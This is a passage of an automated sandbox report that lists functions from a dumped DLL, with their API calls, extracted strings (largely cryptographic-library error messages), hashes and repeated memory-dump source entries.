                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                                          • String ID: Max$Min$RandomNumberType$invalid bit length
                                                          • API String ID: 3718517217-2498579642
                                                          • Opcode ID: e43ece83b5d740d1a92fb8c6f77cd8cf4c98e6b19cd736f590ceb1c9d4c08775
                                                          • Instruction ID: 38de2d547bc537ee4d269f8385e8cc50b5f60d004436a03a5fd89abb12b4275e
                                                          • Opcode Fuzzy Hash: e43ece83b5d740d1a92fb8c6f77cd8cf4c98e6b19cd736f590ceb1c9d4c08775
                                                          • Instruction Fuzzy Hash: 14C19D715097809BE324CB68C850BCFB7E5BFD9304F484A2DE599937A1DB74A908C7A3
                                                          Function 6CFBBE8E Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • __CreateFrameInfo.LIBCMT ref: 6CFBBEB6
                                                            • Part of subcall function 6CFBAB70: __getptd.LIBCMT ref: 6CFBAB7E
                                                            • Part of subcall function 6CFBAB70: __getptd.LIBCMT ref: 6CFBAB8C
                                                          • __getptd.LIBCMT ref: 6CFBBEC0
                                                            • Part of subcall function 6CFBEAE6: __getptd_noexit.LIBCMT ref: 6CFBEAE9
                                                            • Part of subcall function 6CFBEAE6: __amsg_exit.LIBCMT ref: 6CFBEAF6
                                                          • __getptd.LIBCMT ref: 6CFBBECE
                                                          • __getptd.LIBCMT ref: 6CFBBEDC
                                                          • __getptd.LIBCMT ref: 6CFBBEE7
                                                          • _CallCatchBlock2.LIBCMT ref: 6CFBBF0D
                                                            • Part of subcall function 6CFBAC15: __CallSettingFrame@12.LIBCMT ref: 6CFBAC61
                                                            • Part of subcall function 6CFBBFB4: __getptd.LIBCMT ref: 6CFBBFC3
                                                            • Part of subcall function 6CFBBFB4: __getptd.LIBCMT ref: 6CFBBFD1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                          • String ID:
                                                          • API String ID: 1602911419-0
                                                          • Opcode ID: 2f0ca7170338d4d68f0079fd7e15c89089887ab8de1ce19a58d9a12dec6c11fb
                                                          • Instruction ID: 39b8779326973c8f957e4e671a0da7cff375c2ceec820c2f0ab2efd8458ef872
                                                          • Opcode Fuzzy Hash: 2f0ca7170338d4d68f0079fd7e15c89089887ab8de1ce19a58d9a12dec6c11fb
                                                          • Instruction Fuzzy Hash: B511C6B1C00209DFDF14DFA5C944ADEBBB4FF08318F1084A9E854A7750EB389A599FA0
                                                          Function 062B0F14 Relevance: 9.0, Strings: 7, Instructions: 201COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662165312.00000000062B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_62b0000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HERE$HERE$LOOK$LOOK$p<^q$p<^q$Gvq
                                                          • API String ID: 0-792669839
                                                          • Opcode ID: 384f6783225b5e46874b683b076ec227274b065d52f799ea12ab8a1ab3b54d1b
                                                          • Instruction ID: f7fc8b2f73bee156f05c1ff603eb55f1482880944bfa7f24306fcf6515cdbe92
                                                          • Opcode Fuzzy Hash: 384f6783225b5e46874b683b076ec227274b065d52f799ea12ab8a1ab3b54d1b
                                                          • Instruction Fuzzy Hash: 95A19274E10229CFDB68DF68C998BD9B7B1AB48310F1481E9D90DAB361DB709E81CF50
                                                          Function 6CF870E0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 187COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF87267
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throw
                                                          • String ID: exceeds the maximum of $ is less than the minimum of $: IV length
                                                          • API String ID: 2005118841-1273958906
                                                          • Opcode ID: 5b412070b30c6eb1e15f465e7bf764a5b014aa8ad9f85b09e8bc7b580304020f
                                                          • Instruction ID: a97b748993098d953f0dcc1c7e87269f8bbbf7585ded468d73fb6cc74d3d1ad4
                                                          • Opcode Fuzzy Hash: 5b412070b30c6eb1e15f465e7bf764a5b014aa8ad9f85b09e8bc7b580304020f
                                                          • Instruction Fuzzy Hash: EA6183B11083809FD321DB68C884FDFBBE8AF99344F154A1DE59D87741DB75A90887A2
                                                          Function 6CFAAE90 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: _strncmptype_info::operator!=
                                                          • String ID: ThisPointer:$ValueNames
                                                          • API String ID: 1333309372-2375088429
                                                          • Opcode ID: 92cae47590771145ad213ce07f8a404ca9ba382de3f92f842712de726b8164ab
                                                          • Instruction ID: 8ee552a01f9e6931f50a12e2af55c41ed6969b1c262e38258f9fc8f170978d16
                                                          • Opcode Fuzzy Hash: 92cae47590771145ad213ce07f8a404ca9ba382de3f92f842712de726b8164ab
                                                          • Instruction Fuzzy Hash: 6B51E771208744ABC314CFA6D890A67F7FAAF9934CF088A1DE4D58BB41C763E80E8751
                                                          Function 6CF8A360 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: _strncmptype_info::operator!=
                                                          • String ID: ThisPointer:$ValueNames
                                                          • API String ID: 1333309372-2375088429
                                                          • Opcode ID: ddea369b093e9111d10abc991a74d6706b1a8de634217a4b62e1c5f0e605950e
                                                          • Instruction ID: f71cb3fe9a425002e6c9b20ac59aa2bc143ff8e03e932251487b49fbc676a843
                                                          • Opcode Fuzzy Hash: ddea369b093e9111d10abc991a74d6706b1a8de634217a4b62e1c5f0e605950e
                                                          • Instruction Fuzzy Hash: 365103312093406BC3108F65D890A67BBFBEF9630CF088A1CE5D68BFD1C726E9098751
                                                          Function 6CFAB9B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: _strncmptype_info::operator!=
                                                          • String ID: ThisPointer:$ValueNames
                                                          • API String ID: 1333309372-2375088429
                                                          • Opcode ID: cf8a393173986abdd46f48ae1f187477458aeb60e448346341fb2b3e6037fc09
                                                          • Instruction ID: c2ff9966174970bb0c30ed6b6bafa257a0ccde214416386abd64577e9c227530
                                                          • Opcode Fuzzy Hash: cf8a393173986abdd46f48ae1f187477458aeb60e448346341fb2b3e6037fc09
                                                          • Instruction Fuzzy Hash: 4F51D6312083499BC3148FA9D890E67F7FAAF95758F044F1CE4D68BB41C722E90AC751
                                                          Function 6CF91B70 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF91C1A
                                                            • Part of subcall function 6CFBAC75: RaiseException.KERNEL32(?,?,6CFB9C34,CA0C7769,?,?,?,?,6CFB9C34,CA0C7769,6CFE9C90,6CFFB974,CA0C7769), ref: 6CFBACB7
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF91CDE
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF91D3E
                                                          Strings
                                                          • TF_SignerBase: the recoverable message part is too long for the given key and algorithm, xrefs: 6CF91CF0
                                                          • TF_SignerBase: this algorithm does not support messsage recovery or the key is too short, xrefs: 6CF91C67
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                          • String ID: TF_SignerBase: the recoverable message part is too long for the given key and algorithm$TF_SignerBase: this algorithm does not support messsage recovery or the key is too short
                                                          • API String ID: 3476068407-3371871069
                                                          • Opcode ID: 17410ed7631239c4bc3763b5cdc50a2951888118b6a178e93ea312e38056269c
                                                          • Instruction ID: 0bd9767e1ab5167b6b2a58459ae1e9fa19888cef04fa1d5e865d963d90695655
                                                          • Opcode Fuzzy Hash: 17410ed7631239c4bc3763b5cdc50a2951888118b6a178e93ea312e38056269c
                                                          • Instruction Fuzzy Hash: A25139752087409FD360DF68C880F9BB7E9BFC8704F108A1DE59997791DB71E9098BA2
                                                          Function 6CF54010 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CF5402A
                                                            • Part of subcall function 6CFB9125: std::exception::exception.LIBCMT ref: 6CFB913A
                                                            • Part of subcall function 6CFB9125: __CxxThrowException@8.LIBCMT ref: 6CFB914F
                                                            • Part of subcall function 6CFB9125: std::exception::exception.LIBCMT ref: 6CFB9160
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CF54067
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB90ED
                                                            • Part of subcall function 6CFB90D8: __CxxThrowException@8.LIBCMT ref: 6CFB9102
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB9113
                                                          • _memmove.LIBCMT ref: 6CF540C8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                                          • String ID: invalid string position$string too long
                                                          • API String ID: 1615890066-4289949731
                                                          • Opcode ID: 6c4f0cee4adeed3b49a5c43feea420fd2bb3e84e76e58768ba56f5824eb7a8a4
                                                          • Instruction ID: 01a3c012a8092ba4ae423f47e8db3972cd0f5f1fd14986f3afaef3afbbdad81e
                                                          • Opcode Fuzzy Hash: 6c4f0cee4adeed3b49a5c43feea420fd2bb3e84e76e58768ba56f5824eb7a8a4
                                                          • Instruction Fuzzy Hash: D131CA333041109BD3208E5CE840A5AFBA9EBA1765F75062FE251CBB40D772DC7087A1
                                                          Function 6CFBC23B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • ___BuildCatchObject.LIBCMT ref: 6CFBC24E
                                                            • Part of subcall function 6CFBC1A9: ___BuildCatchObjectHelper.LIBCMT ref: 6CFBC1DF
                                                          • _UnwindNestedFrames.LIBCMT ref: 6CFBC265
                                                          • ___FrameUnwindToState.LIBCMT ref: 6CFBC273
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                          • String ID: csm$csm
                                                          • API String ID: 2163707966-3733052814
                                                          • Opcode ID: 2a3f766c9b4dac2ca2754d74b5085f77c001a70fed88627ce95d418e20d78339
                                                          • Instruction ID: 8d2e9d563b9dc5a93361172d779c6afd7c48f6b2e5822642e9c032697486133f
                                                          • Opcode Fuzzy Hash: 2a3f766c9b4dac2ca2754d74b5085f77c001a70fed88627ce95d418e20d78339
                                                          • Instruction Fuzzy Hash: 5701F671401509BBDF126F92CC45EEB7F6AFF08358F104020BD5825A20D736D9B2DBA4
                                                          Function 6CF92300 Relevance: 7.8, APIs: 5, Instructions: 257COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: d3f7db18d1626d03cecf947cd6026d23532ec986eaa51ec770c27e263f9af250
                                                          • Instruction ID: 9383a48fb159d8d90419996a391efd35f70074feed4652dee50c02aaa1cca73c
                                                          • Opcode Fuzzy Hash: d3f7db18d1626d03cecf947cd6026d23532ec986eaa51ec770c27e263f9af250
                                                          • Instruction Fuzzy Hash: F19192B16087019FEB14CF59D984A1BB7E9FF88704F204A2DE495C3B40E735E905CBA2
                                                          Function 6CF73C10 Relevance: 7.7, APIs: 5, Instructions: 186COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayGetElement.OLEAUT32(?,?,CA0C7769), ref: 6CF73C49
                                                          • VariantInit.OLEAUT32(?), ref: 6CF73C81
                                                          • VariantClear.OLEAUT32(?), ref: 6CF73D26
                                                          • VariantClear.OLEAUT32(?), ref: 6CF73D30
                                                          • VariantClear.OLEAUT32(?), ref: 6CF73D89
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$ArrayElementInitSafe
                                                          • String ID:
                                                          • API String ID: 4110538090-0
                                                          • Opcode ID: 7209eefb7c7914b226d8ff546da89bace22fc6181d283c3fbf54a52070bbad09
                                                          • Instruction ID: b6778f2795f531b7d456a864d020d58da18a9070ce425e09c84305b97099474c
                                                          • Opcode Fuzzy Hash: 7209eefb7c7914b226d8ff546da89bace22fc6181d283c3fbf54a52070bbad09
                                                          • Instruction Fuzzy Hash: 1B618F76A00249EFCB00DFA8D984ADEB7B5FF49314F2585AEE515A7350C731AD09CB60
                                                          Function 6CF81D50 Relevance: 7.6, APIs: 5, Instructions: 144timesleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Timetime$Sleep
                                                          • String ID:
                                                          • API String ID: 4176159691-0
                                                          • Opcode ID: 0a016984abf3987f4694b64c64e8dd5cef5d8a1cced36d32c13a69a61f04b0bb
                                                          • Instruction ID: 350a4dfda5348b3ad933f4d17811edb4cc360ecc9bda98b4ff1d182dc5eb7c0e
                                                          • Opcode Fuzzy Hash: 0a016984abf3987f4694b64c64e8dd5cef5d8a1cced36d32c13a69a61f04b0bb
                                                          • Instruction Fuzzy Hash: 5351D2B2E052449FDB10DFA9D885B9E7FB8FB05304F14866AD528E7B40D770DA44CBA1
                                                          Function 6CF66D40 Relevance: 7.6, APIs: 5, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CFB9BB5: _malloc.LIBCMT ref: 6CFB9BCF
                                                          • _rand.LIBCMT ref: 6CF66DEA
                                                            • Part of subcall function 6CFB9E0C: __getptd.LIBCMT ref: 6CFB9E0C
                                                          • std::exception::exception.LIBCMT ref: 6CF66E17
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF66E2C
                                                          • std::exception::exception.LIBCMT ref: 6CF66E3B
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF66E50
                                                            • Part of subcall function 6CFB9BB5: std::exception::exception.LIBCMT ref: 6CFB9C04
                                                            • Part of subcall function 6CFB9BB5: std::exception::exception.LIBCMT ref: 6CFB9C1E
                                                            • Part of subcall function 6CFB9BB5: __CxxThrowException@8.LIBCMT ref: 6CFB9C2F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
